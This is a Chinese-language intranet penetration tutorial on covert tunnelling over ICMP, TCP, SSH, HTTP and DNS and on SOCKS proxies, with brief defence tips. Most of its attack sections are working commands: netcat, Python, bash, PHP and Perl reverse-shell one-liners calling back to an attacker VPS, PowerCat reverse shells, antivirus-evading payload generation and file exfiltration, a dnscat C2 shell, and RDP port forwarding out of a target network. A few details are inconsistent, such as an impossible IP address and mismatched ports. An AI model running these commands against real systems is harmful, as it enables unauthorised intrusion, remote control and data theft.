隱藏通信隧道技術(shù)

一、隱藏通信隧道基礎(chǔ)知識

1. 隱藏通信隧道概述

什么是隧道？這里的隧道就是一種繞過端口屏蔽的通信方式。隱藏通信隧道技術(shù)常用于在訪問受限的網(wǎng)絡(luò)環(huán)境中追蹤數(shù)據(jù)流向和在非受信任的網(wǎng)絡(luò)中實現(xiàn)安全的數(shù)據(jù)傳輸。

常用的隧道技術(shù)：

• 網(wǎng)絡(luò)層：IPv6隧道、ICMP隧道、GRE隧道

• 傳輸層：TCP隧道、UDP隧道、常規(guī)的端口轉(zhuǎn)發(fā)。

• 應(yīng)用層：SSH隧道、DNS隧道、HTTP隧道、HTTPS隧道

2. 判斷內(nèi)網(wǎng)的連通性

判斷內(nèi)網(wǎng)的連通性是指判斷主機能否上外網(wǎng)等。常見的允許流量流出的端口有80、8080、443、53、110、123等。

2.1 ICMP協(xié)議

• ping：命令：ping <IP地址>

2.2 TCP協(xié)議

• netcat：“瑞士軍刀”，簡稱“nc”。通過使用TCP/UDP的網(wǎng)絡(luò)連接來讀寫數(shù)據(jù)。使用命令：nc -zv <IP 端口號>

2.3 HTTP協(xié)議

• curl：curl是一個利用URL規(guī)則在命令行下工作的綜合文件傳輸工具。

• 使用命令：curl < IP:端口號 >

2.4 DNS協(xié)議

• nslookup（windows）

• dig（linux）

2.5 代理服務(wù)器

有時候企業(yè)辦公網(wǎng)利用代理服務(wù)器進行上網(wǎng)，判斷方法：

• 查看網(wǎng)絡(luò)連接

• 查看主機名是否有”proxy“的主機

• 查看IE的代理

二、網(wǎng)絡(luò)層隧道技術(shù)

1. IPv6隧道

IPv6隧道技術(shù)是指通過IPv4隧道傳送的IPv6數(shù)據(jù)報文的技術(shù)。為了使在IPv4網(wǎng)絡(luò)中傳遞IPv6報文，可以將IPv4作為載體，將IPv6報文整體封裝在IPv4數(shù)據(jù)報文中。

• 攻擊方式：攻擊者通過惡意軟件來配置允許進行IPv6通信的設(shè)備。支持IPv6的隧道工具：socat、6tunnel、nt6tunnel等。

• 防御措施：了解IPv6漏洞，綜合其他協(xié)議、設(shè)備來過濾IPv6通信。

2. ICMP隧道

攻擊者可以將TCP/UDP數(shù)據(jù)封裝在ICMP的ping包中，從而穿越防火墻。常見的icmp隧道工具：icmpsh、PingTunnel、icmptunnel、powershell icmp等

• icmpsh

  • git clone https://github.com/inquisb/icmpsh.git 下載icmp

  • apt-get install python-impacket 安裝python-impacket庫

  • sysctl -w net.ipv4.icmp_echo_ignore_all=1 關(guān)閉系統(tǒng)ICMP應(yīng)答（恢復則設(shè)置為0）

  • 輸入"./run.sh"并運行后輸入目標的IP地址。

  • icmpsh.exe -t 192.168.1.7 -d 500 -b 30 -s 128 目標主機上運行此條命令，可在攻擊機192.168.1.7上看到反彈的shell結(jié)果。

• PingTunnel（可以為隧道加密）

  • 在VPS與Web服務(wù)器上安裝編譯

    • tar xf PingTunnel-0.72.tar.gz

    • cd PingTunnel

    • make && make install

  • 遇到報錯--解決

  • 運行PingTunnel

    • 服務(wù)器（IP：192.168.1.4）：ptunnel -x shuteer

    • VPS：ptunnel -p 192.168.1.4 -lp 1080 -da 1.1.1.10 -dp 3389 -x shuteer

    • 參數(shù)說明：

      -x 指定 icmp 隧道連接驗證密碼

      -lp 指定要監(jiān)聽的本地 tcp 端口

      -da 指定要轉(zhuǎn)發(fā)的機器的 ip 地址

      -dp 指定要轉(zhuǎn)發(fā)的機器的 tcp 端口

      -p 指定icmp隧道另一端機器的 ip 地址

3. 防御ICMP隧道攻擊的方法

• 檢測同一來源的ICMP數(shù)據(jù)包的流量，一個正常的icmp命令每秒最多發(fā)送2個數(shù)據(jù)包。

• 注意那些payload大于64bit的icmp數(shù)據(jù)包。

• 尋找響應(yīng)數(shù)據(jù)包中的payload與請求數(shù)據(jù)包中的payload不一致的ICMP數(shù)據(jù)包。

• 檢查ICMP數(shù)據(jù)包的協(xié)議標簽。例如：icmptunnel會在所有的icmp payload前面添加”TUNL“標記來標識隧道。

三、傳輸層隧道技術(shù)

1. lcx端口轉(zhuǎn)發(fā)

? lcx是一個基于Socket套接字實現(xiàn)的端口轉(zhuǎn)化工具，Windows版為lcx.exe，Linux版為portmap。Socket隧道必須具備兩端：一端為服務(wù)端，監(jiān)聽一個端口，等待客戶連接；另一端為客戶端，通過傳入服務(wù)端的IP地址與端口，才能主動與服務(wù)器連接。

• 內(nèi)網(wǎng)端口轉(zhuǎn)發(fā)

舉例：將目標主機的3389端口的所有數(shù)據(jù)轉(zhuǎn)發(fā)到公網(wǎng)VPS的4444端口上。在目標主機上執(zhí)行命令，命令如下：

lcx.exe -slave <公網(wǎng)IP地址> 4444 127.0.0.1 3389

將VPS上的4444端口上監(jiān)聽的所有數(shù)據(jù)轉(zhuǎn)發(fā)到5555端口上，命令如下：

lcx.exe -listen 4444 5555

然后在VPS上用mstsc登錄主機127.0.0.1的5555端口，即可訪問目標服務(wù)器的3389端口。

• 本地端口轉(zhuǎn)發(fā)

如果目標服務(wù)器由于防火墻的限制，部分端口如3389的數(shù)據(jù)無法通過防火墻，這時就可以將目標服務(wù)器相應(yīng)端口的數(shù)據(jù)透傳到防火墻允許的端口如53。在目標主機上執(zhí)行如下命令即可。

lcx -tran 53 <目標主機IP地址> 3389

2. netcat

netcat簡稱nc，作為安全界的瑞士軍刀，功能非常強大。

2.1 安裝

安裝的具體步驟見www.baidu.com

2.2 簡單使用參數(shù)

-d 后臺模式

-e 程序重定向

-g <網(wǎng)關(guān)> 設(shè)置路由器躍程通信網(wǎng)關(guān)，最多可設(shè)置8個；

-G <指向器數(shù)目> 設(shè)置來源路由指向器，其數(shù)值為4的倍數(shù)；

-h 在線幫助；

-i <延遲秒數(shù)> 設(shè)置時間間隔，以便傳送信息及掃描通信端口；

-l 使用監(jiān)聽模式，管控傳入的資料；

-n 直接使用IP地址，而不通過域名服務(wù)器；

-o <輸出文件> 指定文件名稱，把往來傳輸?shù)臄?shù)據(jù)以16進制字碼傾倒成該文件保存；

-p <通信端口> 設(shè)置本地主機使用的通信端口；

-r 隨機指定本地與遠端主機的通信端口；

-s <來源位址> 設(shè)置本地主機送出數(shù)據(jù)包的IP地址；

-u 使用UDP傳輸協(xié)議；

-v 詳細輸出；

-w <超時秒數(shù)> 設(shè)置等待連線的時間；

-z 將輸入輸出關(guān)掉，只在掃描通信端口時使用。

以上為netcat的參數(shù)信息，需要實現(xiàn)具體功能時到上網(wǎng)查具體的命令即可。

常用的具體功能有：

• Banner抓取

• 連接遠程主機

• 端口掃描

• 端口監(jiān)聽

• 文件傳輸

• 簡易聊天

• ...

2.3 獲取Shell

? shell分兩種，一種為正向shell，一種為反向shell。如果客戶端連接服務(wù)器，客戶端想得獲取服務(wù)器的shell，就稱為正向shell。如果客戶端連接服務(wù)器，服務(wù)器想要獲取客戶端的shell，就稱為反向shell。

• 正向Shell獲取

目標主機上（IP：192.168.1.11）監(jiān)聽4444端口：

nc -lvp 4444 -e /bin/sh                           //linux
nc -lvp 4444 -e C:\WINDOWS\system32\cmd.exe      //windows

注：-l 表示監(jiān)聽模式，-v表示詳細輸出，-p 指定端口

VPS連接目標主機的4444端口：

nc 192.168.1.11 4444

• 反向Shell獲取

本地主機（VPS）監(jiān)聽9999端口：

nc -lvp 9999

在目標主機上進行連接：

nc 192.168.11.144 9999 -e /bin/sh        //linux  
nc 192.168.11.144 9999 -e C:\WINDOWS\system32\cmd.exe  //windows

2.4 在目標主機中沒有nc時獲取反向Shell

2.4.1 python反向Shell

• VPS上監(jiān)聽本地2222端口：

nc -lvp 2222

• 在目標主機上執(zhí)行命令：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.4",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.4.2 bash反向Shell

• VPS上監(jiān)聽本地4444端口：

nc -lvp 4444

• 在目標主機上執(zhí)行命令：

bash -i >& /dev/tcp/192.168.1.4/4444 0>&1

2.4.3 PHP反向Shell

• 在VPS上監(jiān)聽本地2222端口：

nc -lvp 2222

• 在目標主機上執(zhí)行下面命令：

php -r '$sock=fsockopen("192.168.1.4",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

3.4.4 perl反向Shell

• 在VPS上監(jiān)聽本地4444端口

nc -lvp 4444

• 如果目標機上使用的是Perl語言，則我們可以使用Perl來建立反向Shell。目標主機上執(zhí)行命令：

perl -e 'use Socket;$i=”192.168.1.4″;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};'

2.5 內(nèi)網(wǎng)代理

拓撲圖如下：

image.png

測試環(huán)境：攻擊者VPS（KALI）；一個小型內(nèi)網(wǎng)；三臺服務(wù)器。假設(shè)已經(jīng)取得Web服務(wù)器權(quán)限，kali不能訪問數(shù)據(jù)庫服務(wù)器linux，web服務(wù)器可以訪問數(shù)據(jù)庫服務(wù)器。

測試目標：獲取數(shù)據(jù)庫服務(wù)器的shell。步驟如下：

• 首先要在VPS上監(jiān)聽3333端口

nc -lvp 3333

• 數(shù)據(jù)庫服務(wù)器上允許命令：

nc -lvp 3333 -e /bin/sh

• 最后在web服務(wù)器上執(zhí)行命令：

nc -v 192.168.1.4 3333 -c "nc -v 1.1.1.200 3333"

注：-e 表示程序重定向，-c 執(zhí)行命令

3. PowerCat

PowerCat可以說是nc的PowerShell版本，PowerCat可以通過執(zhí)行命令回到本地運行，也可以使用遠程權(quán)限運行。里面也加入了眾多好用的功能，如文件上傳，smb協(xié)議支持，中繼模式，生成payload，端口掃描等等。

3.1 下載PowerCat

具體下載安裝步驟百度即可。

3.2 測試環(huán)境

環(huán)境介紹：

Kali：192.168.227.129；

Windows7：192.168.227.161、192.168.130.150

Windows server 2008：192.168.130.100

image.png

3.3 通過nc正向連接PowerCat

• Windows7執(zhí)行命令：

powercat -l -p 8080 -e cmd.exe -v

• Kali上運行：

nc 192.168.277.161 8080 -vv

注：-l 監(jiān)聽模式；-p 指定監(jiān)聽端口；-e 指定要啟動進程的名稱；-v 顯示詳情

3.4 通過nc反向連接PowerCat

• Kali上運行：

netcat -l -p 8888 -vv

• 在Windows7上運行下面命令：

powercat -c 192.168.56.129 -p 8888 -v -e cmd.exe

注：在Windows下，-c 表示參數(shù)用戶提供想要連接的IP地址

3.5 通過PowerCat返回PowerShell

? 前面的操作都是可以與nc進行交互的，但是，如果想要返回Powershell，則無法與nc進行交互。下面介紹讓Windows7與Windows Server 2008建立正向連接。

• 在Windows7下執(zhí)行命令：

powecat -l -p 8080 –v

• 在Windows Server 2008下執(zhí)行命令：

powercat -c 192.168.130.150 -p 8080 -v –ep

注：-ep 參數(shù)用于返回PowerShell

3.6 通過PowerCat傳輸文件

• Windows7下執(zhí)行命令：

powercat -l -p 8080 -of  c:\Users\ctfwin7\Desktop\flag.txt -v

• Windows Server 2008下執(zhí)行命令：

powercat -c 192.168.130.150 -p 8080 -i c:\flag.txt -v

上述命令的解釋是：Windows Server 2008將文件c:\flag.txt通過端口8080傳輸給Windows7，Windows7將文件存放于c:\Users\ctfwin7\Desktop\下，

注：-i 輸入；-of 輸出文件名

3.7 用PowerCat生成Payload（躲避殺軟）

• Windows7下執(zhí)行：

powercat -l -p 8080 -e cmd -v -g >> shell.ps1   //想反彈shell
powercat -l -p 8080 -ep -v -g >> shell.ps1      //想反彈PowerShell

• 將生成的shell.ps1拿到Windows server 2008下執(zhí)行：

./shell.ps1

• 最后Windows7上執(zhí)行下面命令即可獲得反彈的shell

powercat -c 192.168.130.100 -p 8000 -v

PS：也可以使用-ge生成編碼后的腳本，然后直接使用powershell -e <編碼>進行執(zhí)行。

3.8 PowerCat DNS隧道

? PowerCat也是一套基于DNS通信，PowerCat的DNS的通信是基于dnscat設(shè)計的（其服務(wù)端就是dnscat）。

• 在kali下下載安裝dnscat（請百度）
• kali下執(zhí)行：

ruby dns2.rb ms08067.test -e open --no-cache

• Windows7下執(zhí)行以下命令后就可以在kali看到dnscat上反彈的Shell了。

powercat -c 192.168.227.129 -p 53 -dns ms08067.test -e cmd.exe

注：-dns 表示使用DNS通信。

3.9 將PowerCat作為跳板

將win7作為跳板，讓Kali連接winserver2008。

• Windows server 2008下執(zhí)行：

Powercat -l -v -p 9999 -e cmd.exe

• Windows 7下執(zhí)行：

Powercat -l -v -p 8000 -r tcp:192.168.130.100:9999

• Kali下執(zhí)行：

nc 192.168.227.161 8000 –vv

最后，kali和win7進行連接，且win7就可以將流量轉(zhuǎn)發(fā)給winserver2008了。

四、應(yīng)用層隧道技術(shù)

應(yīng)用層的隧道通信技術(shù)主要利用應(yīng)用軟件提供的端口發(fā)送數(shù)據(jù)。常用的隧道協(xié)議有SSH、HTTPS/HTTPS與DNS。

1. SSH隧道

1.1 SSH簡介

• SSH 端口轉(zhuǎn)發(fā)能夠提供兩大功能：

  1.加密 SSH Client 端至 SSH Server 端之間的通訊數(shù)據(jù)。

  2.突破防火墻的限制完成一些之前無法建立的 TCP 連接。

• 用戶名密碼登錄原理

  1.遠程主機收到用戶的登錄請求，把自己的公鑰發(fā)給用戶

  2.用戶使用該公鑰，將登錄密碼加密后，發(fā)送給遠程主機。

  3.遠程主機用自己的私鑰，解密登錄密碼，如果密碼正確，就用戶登錄。

在學習SSH隧道之前，先復習下SSH的配置文件吧。SSH的配置文件：/etc/ssh/sshd_config，下面是一些安全加固的選項。

AllowTcpForwarding yes            #是否允許轉(zhuǎn)發(fā)TCP協(xié)議
GatewayPorts yes                  #是否允許遠程主機連接本地轉(zhuǎn)發(fā)端口
PermitRootLogin yes               #是否允許root登錄
PasswordAuthentication yes        #是否允許使用基于密碼的認證
TCPKeepAlive yes                  #保持心跳,防止 ssh 斷開

1.2 本地端口轉(zhuǎn)發(fā)

• 測試環(huán)境：外部VPS可以訪問內(nèi)網(wǎng)Web服務(wù)器，但是不能訪問數(shù)據(jù)庫服務(wù)器；內(nèi)網(wǎng)Web服務(wù)器和數(shù)據(jù)庫服務(wù)器可以相互訪問。

• 拓撲圖：

image.png

• 滲透思路：以web服務(wù)器192.168.1.11為跳板，將內(nèi)網(wǎng)數(shù)據(jù)庫服務(wù)器1.1.1.10的3389端口映射到VPS機器192.168.1.10的2121端口，再次訪問VPS的2121端口，就可以訪問1.1.1.10的3389端口了。

• 在VPS上執(zhí)行以下命令，會要求服務(wù)Web服務(wù)器（跳板機）的密碼。

ssh –CfNg –L 2121（VPS端口）:1.1.1.10（目標主機IP）:3389（目標端口） root@192.168.1.11

• 在VPS上訪問1153端口后，就可以發(fā)現(xiàn)已經(jīng)與數(shù)據(jù)庫服務(wù)器1.1.1.10的3389端口建立了連接。

rdesktop 127.0.0.1:1153

• 一些參數(shù)解釋：

  • -C 壓縮傳輸，加快傳輸速度。

  • -f 將SSH轉(zhuǎn)入后臺執(zhí)行，不占用當前的shell。

  • -N 建立靜默連接（建立了連接，但是看不到具體會話）。

  • -g 允許遠程主機連接到本地用于轉(zhuǎn)發(fā)的端口。

  • -L 本地端口轉(zhuǎn)發(fā)。

  • -R 遠程端口轉(zhuǎn)發(fā)。

  • -D 動態(tài)轉(zhuǎn)發(fā)（socks代理）。

  • -P 指定SSH端口。

1.3 遠程端口轉(zhuǎn)發(fā)

• 測試環(huán)境：外部VPS不能訪問內(nèi)網(wǎng)Web服務(wù)器，但是Web服務(wù)器可以訪問外網(wǎng)VPS，但是數(shù)據(jù)庫服務(wù)器與域控都不能訪問VPS。目標：通過外網(wǎng)VPS訪問數(shù)據(jù)庫服務(wù)器的3389端口。

• 拓樸圖

image.png

• 滲透思路：以web服務(wù)器192.168.1.11為跳板，將VPS的3307端口的流量轉(zhuǎn)發(fā)到1.1.1.10的3389端口，然后訪問VPS的3307端口，就可以訪問1.1.1.10的3307端口。

• 在web服務(wù)器1.1.1.116上執(zhí)行如下命令：

ssh -CfNg -R 3307（VPS端口）:1.1.1.10（目標主機IP）:3389（目標端口） root@192.168.1.10

• 在本地訪問VPS的端口3307，就可以發(fā)現(xiàn)已經(jīng)與數(shù)據(jù)庫服務(wù)器1.1.1.10的3389端口建立了連接。

rdesktop 127.0.0.1：3307

1.4 動態(tài)轉(zhuǎn)發(fā)

動態(tài)端口映射就是建立一個SSH加密的SOCKS 4/5代理通道，任何支持SOCKS 4/5協(xié)議的程序都可以使用這個加密通道進行代理訪問。

• 拓樸圖

image.png

• 在VPS上執(zhí)行下面命令后，再輸入Web服務(wù)器的密碼。

ssh -CfNg -D 7000 root@192.168.1.11

• 在本地打開瀏覽器。設(shè)置網(wǎng)絡(luò)代理，設(shè)置SOCKS host為127.0.0.1，Port為7000。最后通過瀏覽器訪問內(nèi)網(wǎng)域控制器1.1.1.2。

• 本地主機查看SSH進程正在監(jiān)聽7000端口：

netstat tunpl | grep ":7000"

1.5 防御SSH隧道攻擊的思路

SSH隧道之所以被利用，主要是因為系統(tǒng)的訪問控制措施還不夠，可以從以下幾點來防御SSH隧道攻擊。

• 在系統(tǒng)中設(shè)置SSH遠程訪問控制白名單，在ACL中限制只允許特定的IP地址才能連接SSH，系統(tǒng)設(shè)置完全帶外管理等。

• 內(nèi)網(wǎng)限制SSH遠程登錄的地址與雙向訪問控制策略。

2. HTTP/HTTPS協(xié)議

2.1 簡介

HTTP Service代理用于將所有的流量轉(zhuǎn)發(fā)到內(nèi)網(wǎng)，常見的代理工具有reGeorg、meterpreter、tunna等。

reGeory的特征非常明顯。reGeory支持ASPX、PHP、JSP等Web腳本。

2.2 攻擊步驟：

1.將腳本文件上傳至目標服務(wù)器中，使用Kali 在本地訪問遠程服務(wù)器上的腳本文件，返回后，利用reGeorySocksProxy.py腳本監(jiān)聽本地的端口，即可建立一個通信鏈路。

python reGeorySocksProxy.py -u http://遠程服務(wù)器IP：8080/tunnel.jsp -p 9999(本地端口)

隧道正常工作后，可以在本地kali 機器上使用ProxyChains之類的工具，訪問目標內(nèi)網(wǎng)中的資源。

2.3 防御

嚴格監(jiān)控http隧道的情況，及時發(fā)現(xiàn)問題。

3. DNS協(xié)議

3.1 DNS隧道簡介

用戶管理僵尸網(wǎng)絡(luò)和進行APT攻擊的服務(wù)器叫做C&C服務(wù)器（Command and Control Server，命令及控制服務(wù)器）。C&C節(jié)點分為兩中種，一種是C&C服務(wù)端（攻擊者），另一種是C&C客戶端（被控制的計算機）。C&C通信是指植入C&C客戶端的木馬或者后門程序與C&C服務(wù)端上的遠程控制程序之間的通信。

DNS隧道的工作原理很簡單：在進行DNS查詢時，如果查詢的域名不在DNS服務(wù)器本機的緩存中，就會訪問互聯(lián)網(wǎng)進行查詢，然后返回結(jié)果，如果互聯(lián)網(wǎng)上有一臺定制的服務(wù)器，那么依靠DNS協(xié)議就可以進行數(shù)據(jù)包的交換，從DNS協(xié)議的角度來看，這樣的操作只是一次次地查詢某個特定的域名并且得到解析結(jié)果，但其本質(zhì)的問題是，預期的返回結(jié)果應(yīng)該是一個IP地址，而事實上不是——返回的可以是任意字符串，包括加密的C&C指令。簡單地說，就是將其他協(xié)議封裝在DNS協(xié)議中進行傳輸。

3.2 常用工具及攻擊過程

• dnscat2

  • 在VPS上部署域名解析

  • 在VPS上安裝dnscat2服務(wù)端

  • 在目標主機上安裝客戶端

  • 反彈shell

• iodine

3.3 防御DNS隧道攻擊的方法

• 禁止網(wǎng)絡(luò)中的任何人向外部服務(wù)器發(fā)送DNS請求，只允許與受信任的DNS服務(wù)器通信。

• 將郵件服務(wù)器/網(wǎng)關(guān)列入白名單并阻止傳入和傳出的流量中的txt請求。

• 跟蹤用戶的DNS查詢次數(shù)。

• 阻止ICMP。

五、SOCKS代理

1. SOCKS代理簡介

SOCKS是一種代理服務(wù)，可以將一端的系統(tǒng)連接到另一端。SOCKS支持多種協(xié)議，包括HTTP、FTP等。SOCKS分為 SOCKS4 與 SOCK5 兩種類型：SOCKS4 只支持TCP協(xié)議；SOCKS5 不僅支持TCP/UDP協(xié)議，還支持多種身份驗證機制等，其標準端口號為1080。SOCKS能與目標內(nèi)網(wǎng)計算機進行通信，避免多次端口轉(zhuǎn)發(fā)。

SOCKS代理可以理解為增強版的lcx。它在服務(wù)端監(jiān)聽一個服務(wù)端口。當有新的連接請求出現(xiàn)時，會先從SOCKS協(xié)議中解析目標的URL的目標端口，再執(zhí)行l(wèi)cx的具體功能。

正向代理簡單來說就是主動通過代理去訪問目標服務(wù)器，反向代理是指目標服務(wù)器通過代理來主動連接。

2. 常用的SOCKS工具

• EarthWorm（EW）

  • 正向代理

  • 反向代理

• reGeory

• sSocks

• SocksCap64

• Proxifier

• ProxyChanis

六、壓縮數(shù)據(jù)

1. RAR

1.1 以rar格式壓縮/解壓

將E:\webs\目錄下的所有內(nèi)容打包為1.rar放入E:\webs\目錄下

rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\

將E:\webs\1.rar解壓到當前根目錄下

rar.exe e E:\webs\1.rar

注：參數(shù) e 表示解壓到當前根目錄下。 x 表示以絕對路徑解壓。

1.2 分卷壓縮/解壓

分卷壓縮E盤API目錄下的所有文件及文件夾，設(shè)置每個分卷為20M

rar.exe a -m0 -r -v20m E:\test.rar E:\API

將E:\test.part01.rar解壓到E盤的x1目錄下

rar.exe x E:\test.part01.rar E:\x1

2. 7-Zip

七、文件上傳與下載

1. 利用FTP上傳

2. 利用VBS上傳

3. 利用Debug上傳

4. 利用Nishang上傳

Nishang是一個Powershell攻擊框架，它是PowerShell攻擊腳本和有效載荷的一個集合。Nishang被廣泛應(yīng)用于滲透測試的各個階段。

5. 利用bitsadmin下載

6. 利用Powershell下載

注：這里說聲抱歉。由于內(nèi)容太多、不易手打，這里就只是介紹某些概念。一些具體操作可百度查找資料或購買書籍《內(nèi)網(wǎng)安全攻防·滲透測試實戰(zhàn)指南》查閱。